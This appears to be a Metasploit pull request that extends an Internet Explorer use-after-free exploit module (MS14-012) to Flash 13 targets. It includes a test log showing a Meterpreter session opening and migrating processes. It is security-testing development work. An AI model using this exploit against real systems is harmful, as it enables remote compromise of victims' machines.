### PR TITLE
ms14_012_cmarkup_uaf exploit also works with flash 13

### DIFF
--- a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb
+++ b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
           :ua_name     => Msf::HttpClients::IE,
           :ua_ver      => '10.0',
           :mshtml_build => lambda { |ver| ver.to_i < 16843 },
-          :flash       => /^12\./
+          :flash       => /^1[23]\./
         },
       'DefaultOptions' =>
         {


### PR DESCRIPTION
Flash 13 can also be used for exploitation, this pull request allows to use it.
## Verification
- [ ] Test like #3266, but using a flash 13 version. You should enjoy sessions still. I've tested with fp_13.0.0.182 and fp_13.0.0.206

```
[*] 10.6.0.83        ms14_012_cmarkup_uaf - Request: /BCWa6c8
[*] 10.6.0.83        ms14_012_cmarkup_uaf - Gathering target information.
[*] 10.6.0.83        ms14_012_cmarkup_uaf - Sending response HTML.
[*] 10.6.0.83        ms14_012_cmarkup_uaf - Request: /BCWa6c8/SIbYB/
[*] 10.6.0.83        ms14_012_cmarkup_uaf - Request: /BCWa6c8/rWvDbY/
[*] 10.6.0.83        ms14_012_cmarkup_uaf - Sending HTML...
[*] 10.6.0.83        ms14_012_cmarkup_uaf - Request: /BCWa6c8/rWvDbY/wbRR.swf
[*] 10.6.0.83        ms14_012_cmarkup_uaf - Sending SWF...
[*] 10.6.0.83        ms14_012_cmarkup_uaf - Request: /BCWa6c8/rWvDbY/wbRR.swf
[*] 10.6.0.83        ms14_012_cmarkup_uaf - Sending SWF...
[*] Sending stage (769536 bytes) to 10.6.0.83
[*] Meterpreter session 2 opened (10.6.0.83:4444 -> 10.6.0.83:50833) at 2014-04-28 16:22:31 -0500
[*] Session ID 2 (10.6.0.83:4444 -> 10.6.0.83:50833) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3388)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3308
[+] Successfully migrated to process
```
